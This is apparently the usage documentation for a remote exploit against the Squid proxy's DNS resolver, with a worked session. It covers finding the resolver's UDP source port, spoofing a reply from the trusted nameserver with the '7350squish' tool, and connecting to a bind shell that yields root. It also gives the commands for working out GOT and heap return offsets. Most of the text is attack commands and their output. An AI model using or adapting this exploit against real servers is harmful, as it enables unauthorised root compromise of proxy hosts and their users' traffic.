exploitation ============ Squid uses the same UDP port all the time for its resolver. You have to find this port number. Also, you need to find the trusted nameserver and its port (always 53). Some Squids trust every nameserver, but most (default) do only trust the default nameserver. So you either have to be in the local LAN or be able to spoof packets from the trusted nameservers address. The UDP port number is high ephemeral and for most Linux installations, it is somewhere around (32768 - 32900). The offsets are tight, you will have to get the exact stuff or brute long. Since you attack the child process of Squid, which gets restarted on crash, you have unlimited tries. Each try creates two log entries in the squid logfile. Exploitation example: --------------------- 192.168.144.6 is the Squid server, 130.149.17.5 the default nameserver it uses and trusts. # tcpdump -n src 192.168.144.6 and udp and dst port 53 & # (echo "HEAD http://test.ts/ HTTP/1.0" ; echo ) | \ nc 192.168.144.6 3128 >/dev/null 18:57:03.070418 192.168.144.6.32819 > 130.149.17.5.53: 9+ A? test.ts. (25) (DF) ^^^^^ We see the sourceport it uses and the trusted nameserver address. # ./7350squish -t 3 -p 4050 130.149.17.5:53 192.168.144.6:32819 \ 2>&1 >/dev/null After the packet has been send, we need to trigger the resolver a second time to let it read our packet. # (echo "HEAD http://test2.ts/ HTTP/1.0" ; echo) | \ nc 192.168.144.6 3128 >/dev/null # telnet 192.168.144.6 4050 Trying 192.168.144.6... Connected to 192.168.144.6. Escape character is '^]'. id; uid=0(root) gid=13(proxy) euid=13(proxy) groups=13(proxy) On some systems, Squid runs as uid=0 (for some strange reason I've to figure out), debian sid for example. offsets ======= retloc: ------- Any GOT entry that is used often will do fine: # objdump --dynamic-reloc /usr/sbin/squid | grep memcpy 080df838 R_386_JUMP_SLOT memcpy retaddr: -------- There are multiple places we can return to, but this is the most fixed one (static lower heap buffer). # ltrace -o out -p `ps auxwww|egrep "\(squid\)"|awk '{print $2}'` (on another term, use the squid, as in): # (echo "HEAD http://www.cow.org/ HTTP/1.0";echo) | nc 127.0.0.1 3128 (now abort the ltrace process). # grep recvfrom out Will give output like: 1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = 116 1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = -1 ^^^^^^^^^^ retaddr = 0x080f2c60 + 0x90 = 0x080f2cf0 alignments: ----------- The default (0x0182, 288) should be just fine. If not, those are more difficult to get.